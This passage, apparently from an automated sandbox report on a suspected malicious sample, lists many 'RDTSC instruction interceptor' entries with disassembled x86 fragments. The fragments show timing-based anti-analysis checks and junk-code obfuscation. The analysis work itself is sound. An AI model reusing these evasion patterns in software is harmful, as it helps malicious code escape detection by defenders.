0x00000054 push eax 0x00000055 ret 0x00000056 pop eax 0x00000057 ret 0x00000058 mov esi, 6A15C063h 0x0000005d xchg eax, ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 jnp 00007F8E4CE84BF6h 0x00000067 pop eax 0x00000068 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CD28 second address: 76CD41 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8E4CB125C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jc 00007F8E4CB125C6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CD41 second address: 76CD4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8E4CE84BF6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F001 second address: 76F007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F007 second address: 76F00C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F00C second address: 76F09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E4CB125D3h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F8E4CB125C8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 sub edi, 18074F12h 0x0000002d push 00000000h 0x0000002f mov esi, 656854CBh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F8E4CB125C8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 mov si, 0F7Ch 0x00000054 xchg eax, ebx 0x00000055 jmp 00007F8E4CB125CCh 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F8E4CB125D2h 0x00000062 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FA71 second address: 76FAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8E4CE84BFFh 0x00000013 pop edx 0x00000014 nop 0x00000015 cmc 0x00000016 mov edi, 60A12061h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F8E4CE84BF8h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 push 00000000h 0x00000039 or edi, dword ptr [ebp+122D2B58h] 0x0000003f xchg eax, ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76F820 second address: 76F847 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E4CB125D2h 0x00000008 ja 00007F8E4CB125C6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAC6 second address: 76FACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FACB second address: 76FAE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E4CB125D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 770F4B second address: 770F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771AC2 second address: 771B60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F8E4CB125C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F8E4CB125C8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 jnp 00007F8E4CB125CBh 0x00000049 sbb di, 3543h 0x0000004e push 00000000h 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007F8E4CB125C8h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 0000001Ah 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a cld 0x0000006b push eax 0x0000006c jo 00007F8E4CB125D4h 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771B60 second address: 771B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771896 second address: 77189A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775466 second address: 77546A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77546A second address: 775491 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a je 00007F8E4CB125E7h 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7773D1 second address: 77740B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F8E4CE84BFBh 0x0000000c nop 0x0000000d jnl 00007F8E4CE84BF8h 0x00000013 push 00000000h 0x00000015 mov ebx, dword ptr [ebp+122D2C0Ch] 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e mov dword ptr [ebp+122D317Dh], eax 0x00000024 pop ebx 0x00000025 xchg eax, esi 0x00000026 push edi 0x00000027 push edi 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a pop edi 0x0000002b pop edi 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77740B second address: 777416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8E4CB125C6h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77870E second address: 778730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8E4CE84C09h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A4D9 second address: 77A4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A4DD second address: 77A509 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8E4CE84BFFh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A509 second address: 77A51B instructions: 0x00000000 rdtsc 0x00000002 je 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F8E4CB125CCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A51B second address: 77A578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push edi 0x00000007 mov edi, dword ptr [ebp+122D2DBCh] 0x0000000d pop ebx 0x0000000e jl 00007F8E4CE84BF8h 0x00000014 mov bl, 5Fh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F8E4CE84BF8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 sub dword ptr [ebp+122D1DD5h], edi 0x00000038 push 00000000h 0x0000003a xchg eax, esi 0x0000003b push esi 0x0000003c push ebx 0x0000003d ja 00007F8E4CE84BF6h 0x00000043 pop ebx 0x00000044 pop esi 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F8E4CE84C03h 0x0000004d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A578 second address: 77A57D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B796 second address: 77B79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B79A second address: 77B7A4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8E4CB125C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A834 second address: 77A847 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E4CE84BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jl 00007F8E4CE84BF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B7A4 second address: 77B7A9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B7A9 second address: 77B834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub dword ptr [ebp+122D266Bh], edi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F8E4CE84BF8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F8E4CE84BF8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000018h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 movzx edi, ax 0x00000049 xchg eax, esi 0x0000004a jmp 00007F8E4CE84C05h 0x0000004f push eax 0x00000050 push eax 0x00000051 pushad 0x00000052 jmp 00007F8E4CE84C08h 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B9C6 second address: 77B9DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F8E4CB125CCh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C990 second address: 77C996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77B9DC second address: 77B9E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8E4CB125C6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D786 second address: 77D78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77C996 second address: 77C99B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D78A second address: 77D790 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D790 second address: 77D796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D796 second address: 77D7FB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8E4CE84BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F8E4CE84BF8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov bl, A9h 0x00000029 push esi 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d clc 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F8E4CE84BF8h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1EA5h], edi 0x00000050 push eax 0x00000051 js 00007F8E4CE84BFEh 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E992 second address: 77E9AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E9AE second address: 77E9BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E4CE84BFAh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7809B9 second address: 7809BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7809BE second address: 7809D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F8E4CE84C04h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7809D3 second address: 7809D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7809D7 second address: 780A35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 pushad 0x00000008 mov edi, dword ptr [ebp+12449423h] 0x0000000e jng 00007F8E4CE84BFCh 0x00000014 mov eax, dword ptr [ebp+1245D9D3h] 0x0000001a popad 0x0000001b push 00000000h 0x0000001d or dword ptr [ebp+12468F83h], edi 0x00000023 push 00000000h 0x00000025 pushad 0x00000026 jmp 00007F8E4CE84C06h 0x0000002b pushad 0x0000002c sbb cx, 2C5Eh 0x00000031 mov edx, dword ptr [ebp+1247744Ch] 0x00000037 popad 0x00000038 popad 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d jmp 00007F8E4CE84BFFh 0x00000042 pop eax 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 780A35 second address: 780A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782967 second address: 7829CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F8E4CE84BFCh 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F8E4CE84BF8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F8E4CE84BF8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 jo 00007F8E4CE84BF9h 0x0000004a movzx ebx, si 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 push ecx 0x00000051 pushad 0x00000052 popad 0x00000053 pop ecx 0x00000054 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7829CD second address: 7829D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783816 second address: 78382B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F8E4CE84BFCh 0x0000000f jns 00007F8E4CE84BF6h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78382B second address: 7838AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F8E4CB125C8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007F8E4CB125D8h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F8E4CB125C8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 xor edi, dword ptr [ebp+122D2D8Ch] 0x0000004b mov bh, 2Ch 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+12468F83h], edx 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7838AD second address: 7838C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7838C7 second address: 7838DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F8E4CB125C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7838DF second address: 7838E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7849CC second address: 784A31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F8E4CB125C8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 mov edi, esi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F8E4CB125C8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 cld 0x00000047 mov ebx, dword ptr [ebp+122D2B80h] 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 jl 00007F8E4CB125C6h 0x00000057 pop eax 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783A7B second address: 783A81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783A81 second address: 783AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnc 00007F8E4CB125C8h 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F8E4CB125D1h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783AB8 second address: 783B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1F8Fh], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov edi, dword ptr [ebp+122D2E44h] 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F8E4CE84BF8h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov eax, dword ptr [ebp+122D0451h] 0x00000042 push FFFFFFFFh 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007F8E4CE84BF8h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000014h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D1FCAh], edx 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F8E4CE84C07h 0x0000006e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783B3E second address: 783B44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 783B44 second address: 783B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784B59 second address: 784B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784B63 second address: 784B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786A8E second address: 786AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 movzx edi, bx 0x00000009 push 00000000h 0x0000000b or ebx, dword ptr [ebp+122D2C74h] 0x00000011 push 00000000h 0x00000013 pushad 0x00000014 jl 00007F8E4CB125C7h 0x0000001a clc 0x0000001b jmp 00007F8E4CB125D7h 0x00000020 popad 0x00000021 mov di, 9BACh 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 jns 00007F8E4CB125CCh 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785BBC second address: 785BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 786D2D second address: 786D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FA51 second address: 78FA93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CE84C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8E4CE84C00h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F8E4CE84BFDh 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F8E4CE84BF6h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FA93 second address: 78FABD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E4CB125D4h 0x00000007 jmp 00007F8E4CB125CEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
